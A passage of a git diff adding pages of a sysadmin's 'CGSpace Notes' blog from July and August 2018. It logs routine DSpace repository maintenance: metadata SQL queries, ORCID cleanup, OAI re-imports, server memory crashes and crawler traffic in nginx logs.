+dspace=# \q
+$ csvcut -c 1 &lt; /tmp/affiliations.csv &gt; /tmp/affiliations-1.csv
+</code></pre><ul>
+<li>We also need to discuss standardizing our countries and comparing our ORCID iDs</li>
+</ul>
+<h2 id="2018-07-13">2018-07-13</h2>
+<ul>
+<li>Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
+COPY 4518
+</code></pre><h2 id="2018-07-15">2018-07-15</h2>
+<ul>
+<li>Run all system updates on CGSpace, add latest metadata changes from last week, and start the Linode instance upgrade</li>
+<li>After the upgrade I see we have more disk space available in the instance&rsquo;s dashboard, so I shut the instance down and resized it from 392GB to 650GB</li>
+<li>The resize was very quick (less than one minute) and after booting the instance back up I now have 631GB for the root filesystem (with 267GB available)!</li>
+<li>Peter had asked a question about how mapped items are displayed in the Altmetric dashboard</li>
+<li>For example, <a href="10568/82810">10568/82810</a> is mapped to four collections, but only shows up in one &ldquo;department&rdquo; in their dashboard</li>
+<li>Altmetric help said that <a href="https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/82810">according to OAI that item is only in one department</a></li>
+<li>I noticed that indeed there was only one collection listed, so I forced an OAI re-import on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace oai import -c
+OAI 2.0 manager action started
+Clearing index
+Index cleared
+Using full import.
+Full import
+100 items imported so far...
+200 items imported so far...
+...
+73900 items imported so far...
+Total: 73925 items
+Purging cached OAI responses.
+OAI 2.0 manager action ended. It took 697 seconds.
+</code></pre><ul>
+<li>Now I see four colletions in OAI for that item!</li>
+<li>I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change</li>
+<li>ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
+1020
+$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
+1158
+</code></pre><ul>
+<li>I combined the two lists and regenerated the names for all our the ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
+$ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
+</code></pre><ul>
+<li>Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via <code>% !sort</code> and then checked the formatting with tidy:</li>
+</ul>
+<pre tabindex="0"><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>I will check with the CGSpace team to see if they want me to add these to CGSpace</li>
+<li>Help Udana from WLE understand some Altmetrics concepts</li>
+</ul>
+<h2 id="2018-07-18">2018-07-18</h2>
+<ul>
+<li>ICARDA sent me another refined list of ORCID iDs so I sorted and formatted them into our controlled vocabulary again</li>
+<li>Participate in call with IWMI and WLE to discuss Altmetric, CGSpace, and social media</li>
+<li>I told them that they should try to be including the Handle link on their social media shares because that&rsquo;s the only way to get Altmetric to notice them and associate them with their DOIs</li>
+<li>I suggested that we should have a wider meeting about this, and that I would post that on Yammer</li>
+<li>I was curious about how and when Altmetric harvests the OAI, so I looked in nginx&rsquo;s OAI log</li>
+<li>For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I see 1500 requsts</li>
+<li>In there I see two bots making about 750 requests each, and this one is probably Altmetric:</li>
+</ul>
+<pre tabindex="0"><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&#34; 200 58653 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
+178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&#34; 200 67950 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
+...
+178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&#34; 20 0 25049 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
+</code></pre><ul>
+<li>So if they are getting 100 records per OAI request it would take them 739 requests</li>
+<li>I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve&hellip; does OAI use Tomcat sessions?</li>
+<li>Appears not:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100&#39;
+GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: HTTPie/0.9.9
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Type: application/xml;charset=UTF-8
+Date: Wed, 18 Jul 2018 14:46:37 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+</code></pre><h2 id="2018-07-19">2018-07-19</h2>
+<ul>
+<li>I tested a submission via SAF bundle to DSpace 5.8 and it worked fine</li>
+<li>In addition to testing DSpace 5.8, I specifically wanted to see if the issue with specifying collections in metadata instead of on the command line would work (<a href="https://jira.duraspace.org/browse/DS-3583">DS-3583</a>)</li>
+<li>Post a note on Yammer about Altmetric and Handle best practices</li>
+<li>Update PostgreSQL JDBC jar from 42.2.2 to 42.2.4 in the <a href="https://github.com/ilri/rmg-ansible-public">RMG Ansible playbooks</a></li>
+<li>IWMI asked why all the dates in their <a href="https://cgspace.cgiar.org/open-search/discover?query=dateIssued:2018&amp;scope=10568/16814&amp;sort_by=2&amp;order=DESC&amp;rpp=100&amp;format=rss">OpenSearch RSS feed</a> show up as January 01, 2018</li>
+<li>On closer inspection I notice that many of their items use &ldquo;2018&rdquo; as their <code>dc.date.issued</code>, which is a valid ISO 8601 date but it&rsquo;s not very specific so DSpace assumes it is January 01, 2018 00:00:00&hellip;</li>
+<li>I told her that they need to start using more accurate dates for their issue dates</li>
+<li>In the example item I looked at the DOI has a publish date of 2018-03-16, so they should really try to capture that</li>
+</ul>
+<h2 id="2018-07-22">2018-07-22</h2>
+<ul>
+<li>I told the IWMI people that they can use <code>sort_by=3</code> in their OpenSearch query to sort the results by <code>dc.date.accessioned</code> instead of <code>dc.date.issued</code></li>
+<li>They say that it is a burden for them to capture the issue dates, so I cautioned them that this is in their own benefit for future posterity and that everyone else on CGSpace manages to capture the issue dates!</li>
+<li>For future reference, as I had previously noted in <a href="/cgspace-notes/2018-04/">2018-04</a>, sort options are configured in <code>dspace.cfg</code>, for example:</li>
+</ul>
+<pre tabindex="0"><code>webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
+</code></pre><ul>
+<li>Just because I was curious I made sure that these options are working as expected in DSpace 5.8 on DSpace Test (they are)</li>
+<li>I tested the Atmire Listings and Reports (L&amp;R) module one last time on my local test environment with a new snapshot of CGSpace&rsquo;s database and re-generated Discovery index and it worked fine</li>
+<li>I finally informed Atmire that we&rsquo;re ready to proceed with deploying this to CGSpace and that they should advise whether we should wait about the SNAPSHOT versions in <code>pom.xml</code></li>
+<li>There is no word on the issue I reported with Tomcat 8.5.32 yet, though&hellip;</li>
+</ul>
+<h2 id="2018-07-23">2018-07-23</h2>
+<ul>
+<li>Still discussing dates with IWMI</li>
+<li>I looked in the database to see the breakdown of date formats used in <code>dc.date.issued</code>, ie YYYY, YYYY-MM, or YYYY-MM-DD:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}$&#39;;
+ count
+-------
+ 53292
+(1 row)
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}$&#39;;
+ count
+-------
+  3818
+(1 row)
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}-[0-9]{2}$&#39;;
+ count
+-------
+ 17357
+</code></pre><ul>
+<li>So it looks like YYYY is the most numerious, followed by YYYY-MM-DD, then YYYY-MM</li>
+</ul>
+<h2 id="2018-07-26">2018-07-26</h2>
+<ul>
+<li>Run system updates on DSpace Test (linode19) and reboot the server</li>
+</ul>
+<h2 id="2018-07-27">2018-07-27</h2>
+<ul>
+<li>Follow up with Atmire again about the SNAPSHOT versions in our <code>pom.xml</code> because I want to finalize the DSpace 5.8 upgrade soon and I haven&rsquo;t heard from them in a month (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">ticket 560</a>)</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-08/index.html b/docs/2018-08/index.html
new file mode 100644
index 000000000..711cd139a
--- /dev/null
+++ b/docs/2018-08/index.html
@@ -0,0 +1,496 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="August, 2018" />
+<meta property="og:description" content="2018-08-01
+
+DSpace Test had crashed at some point yesterday morning and I see the following in dmesg:
+
+[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
+Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight
+From the DSpace log I see that eventually Solr stopped responding, so I guess the java process that was OOM killed above was Tomcat&rsquo;s
+I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;
+Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core
+The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes
+I ran all system updates on DSpace Test and rebooted it
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-08/" />
+<meta property="article:published_time" content="2018-08-01T11:52:54+03:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="August, 2018"/>
+<meta name="twitter:description" content="2018-08-01
+
+DSpace Test had crashed at some point yesterday morning and I see the following in dmesg:
+
+[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
+Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight
+From the DSpace log I see that eventually Solr stopped responding, so I guess the java process that was OOM killed above was Tomcat&rsquo;s
+I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;
+Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core
+The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes
+I ran all system updates on DSpace Test and rebooted it
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "August, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-08/",
+  "wordCount": "2748",
+  "datePublished": "2018-08-01T11:52:54+03:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-08/">
+
+    <title>August, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-08/">August, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-08-01T11:52:54+03:00">Wed Aug 01, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-08-01">2018-08-01</h2>
+<ul>
+<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight</li>
+<li>From the DSpace log I see that eventually Solr stopped responding, so I guess the <code>java</code> process that was OOM killed above was Tomcat&rsquo;s</li>
+<li>I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;</li>
+<li>Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core</li>
+<li>The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes</li>
+<li>I ran all system updates on DSpace Test and rebooted it</li>
+</ul>
+<ul>
+<li>I started looking over the latest round of IITA batch records from Sisay on DSpace Test: <a href="https://dspacetest.cgiar.org/handle/10568/103250">IITA July_30</a>
+<ul>
+<li>incorrect authorship types</li>
+<li>dozens of inconsistencies, spelling mistakes, and white space in author affiliations</li>
+<li>minor issues in countries (California is not a country)</li>
+<li>minor issues in IITA subjects, ISBNs, languages, and AGROVOC subjects</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-08-02">2018-08-02</h2>
+<ul>
+<li>DSpace Test crashed again and I don&rsquo;t see the only error I see is this in <code>dmesg</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Thu Aug  2 00:00:12 2018] Out of memory: Kill process 1407 (java) score 787 or sacrifice child
+[Thu Aug  2 00:00:12 2018] Killed process 1407 (java) total-vm:18876328kB, anon-rss:6323836kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>I am still assuming that this is the Tomcat process that is dying, so maybe actually we need to reduce its memory instead of increasing it?</li>
+<li>The risk we run there is that we&rsquo;ll start getting OutOfMemory errors from Tomcat</li>
+<li>So basically we need a new test server with more RAM very soon&hellip;</li>
+<li>Abenet asked about the workflow statistics in the Atmire CUA module again</li>
+<li>Last year Atmire told me that it&rsquo;s disabled by default but you can enable it with <code>workflow.stats.enabled = true</code> in the CUA configuration file</li>
+<li>There was a bug with adding users so they sent a patch, but I didn&rsquo;t merge it because it was <a href="https://github.com/ilri/DSpace/pull/319">very dirty</a> and I wasn&rsquo;t sure it actually fixed the problem</li>
+<li>I just tried to enable the stats again on DSpace Test now that we&rsquo;re on DSpace 5.8 with updated Atmire modules, but every user I search for shows &ldquo;No data available&rdquo;</li>
+<li>As a test I submitted a new item and I was able to see it in the workflow statistics &ldquo;data&rdquo; tab, but not in the graph</li>
+</ul>
+<h2 id="2018-08-15">2018-08-15</h2>
+<ul>
+<li>Run through Peter&rsquo;s list of author affiliations from earlier this month</li>
+<li>I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors</li>
+<li>Finally I did a test run with the <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
+$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
+</code></pre><h2 id="2018-08-16">2018-08-16</h2>
+<ul>
+<li>Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv; 
+</code></pre><ul>
+<li>Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month</li>
+<li>I might need to overhaul the <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration</li>
+<li>After checking a few examples I see that checking only the <code>text_value</code> and <code>place</code> when adding ORCID fields is not enough anymore</li>
+<li>It was a sane assumption when I was initially migrating ORCID records from Solr to regular metadata, but now it seems that some authors might have been added or changed after item submission</li>
+<li>Now it is better to check if there is <em>any</em> existing ORCID identifier for a given author for the item&hellip;</li>
+<li>I will have to update my script to extract the ORCID identifier and search for that</li>
+<li>Re-create my local DSpace database using the latest PostgreSQL 9.6 Docker image and re-import the latest CGSpace dump:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+</code></pre><h2 id="2018-08-19">2018-08-19</h2>
+<ul>
+<li>Keep working on the CIAT ORCID identifiers from Elizabeth</li>
+<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&rdquo;) I will just tag them with ORCID identifiers too</li>
+<li>This is less obvious and more error prone with names like &ldquo;Peters&rdquo; where there are many more authors</li>
+<li>I see some errors in the variations of names as well, for example:</li>
+</ul>
+<pre tabindex="0"><code>Verchot, Louis
+Verchot, L
+Verchot, L. V.
+Verchot, L.V
+Verchot, L.V.
+Verchot, LV
+Verchot, Louis V.
+</code></pre><ul>
+<li>I&rsquo;ll just tag them all with Louis Verchot&rsquo;s ORCID identifier&hellip;</li>
+<li>In the end, I&rsquo;ll run the following CSV with my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Campbell, Bruce&#34;,Bruce M Campbell: 0000-0002-0123-4859
+&#34;Campbell, Bruce M.&#34;,Bruce M Campbell: 0000-0002-0123-4859
+&#34;Campbell, B.M&#34;,Bruce M Campbell: 0000-0002-0123-4859
+&#34;Peters, Michael&#34;,Michael Peters: 0000-0003-4237-3916
+&#34;Peters, M.&#34;,Michael Peters: 0000-0003-4237-3916
+&#34;Peters, M.K.&#34;,Michael Peters: 0000-0003-4237-3916
+&#34;Tamene, Lulseged&#34;,Lulseged Tamene: 0000-0002-3806-8890
+&#34;Desta, Lulseged Tamene&#34;,Lulseged Tamene: 0000-0002-3806-8890
+&#34;Läderach, Peter&#34;,Peter Läderach: 0000-0001-8708-6318
+&#34;Lundy, Mark&#34;,Mark Lundy: 0000-0002-5241-3777
+&#34;Schultze-Kraft, Rainer&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
+&#34;Schultze-Kraft, R.&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
+&#34;Verchot, Louis&#34;,Louis Verchot: 0000-0001-8309-6754
+&#34;Verchot, L&#34;,Louis Verchot: 0000-0001-8309-6754
+&#34;Verchot, L. V.&#34;,Louis Verchot: 0000-0001-8309-6754
+&#34;Verchot, L.V&#34;,Louis Verchot: 0000-0001-8309-6754
+&#34;Verchot, L.V.&#34;,Louis Verchot: 0000-0001-8309-6754
+&#34;Verchot, LV&#34;,Louis Verchot: 0000-0001-8309-6754
+&#34;Verchot, Louis V.&#34;,Louis Verchot: 0000-0001-8309-6754
+&#34;Mukankusi, Clare&#34;,Clare Mukankusi: 0000-0001-7837-4545
+&#34;Mukankusi, Clare M.&#34;,Clare Mukankusi: 0000-0001-7837-4545
+&#34;Wyckhuys, Kris&#34;,Kris Wyckhuys: 0000-0003-0922-488X
+&#34;Wyckhuys, Kris A. G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
+&#34;Wyckhuys, Kris A.G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
+&#34;Chirinda, Ngonidzashe&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
+&#34;Chirinda, Ngoni&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
+&#34;Ngonidzashe, Chirinda&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
+</code></pre><ul>
+<li>The invocation would be:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers</li>
+<li>Looking at the list of author affialitions from Peter one last time</li>
+<li>I notice that I should add the Unicode character 0x00b4 (`) to my list of invalid characters to look for in Open Refine, making the latest version of the GREL expression being:</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/))
+)
+</code></pre><ul>
+<li>This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n</li>
+<li>I will run the following on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
+$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
+</code></pre><ul>
+<li>Then force an update of the Discovery index on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    72m12.570s
+user    6m45.305s
+sys     2m2.461s
+</code></pre><ul>
+<li>And then on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    79m44.392s
+user    8m50.730s
+sys     2m20.248s
+</code></pre><ul>
+<li>Run system updates on DSpace Test and reboot the server</li>
+<li>In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;19/Aug/2018&#39; | grep -c 5.9.6.51
+1553
+# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-08-19
+1724
+</code></pre><ul>
+<li>I don&rsquo;t even know how its possible for the bot to use MORE sessions than total requests&hellip;</li>
+<li>The user agent is:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
+</code></pre><ul>
+<li>So I&rsquo;m thinking we should add &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager valve, as we already have &ldquo;bot&rdquo; that catches Googlebot, Bingbot, etc.</li>
+</ul>
+<h2 id="2018-08-20">2018-08-20</h2>
+<ul>
+<li>Help Sisay with some UTF-8 encoding issues in a file Peter sent him</li>
+<li>Finish up reconciling Atmire&rsquo;s pull request for DSpace 5.8 changes with the latest status of our <code>5_x-prod</code> branch</li>
+<li>I had to do some <code>git rev-list --reverse --no-merges oldestcommit..newestcommit</code> and <code>git cherry-pick -S</code> hackery to get everything all in order</li>
+<li>After building I ran the Atmire schema migrations and forced old migrations, then did the <code>ant update</code></li>
+<li>I tried to build it on DSpace Test, but it seems to still need more RAM to complete (like I experienced last month), so I stopped Tomcat and set <code>JAVA_OPTS</code> to 1024m and tried the <code>mvn package</code> again</li>
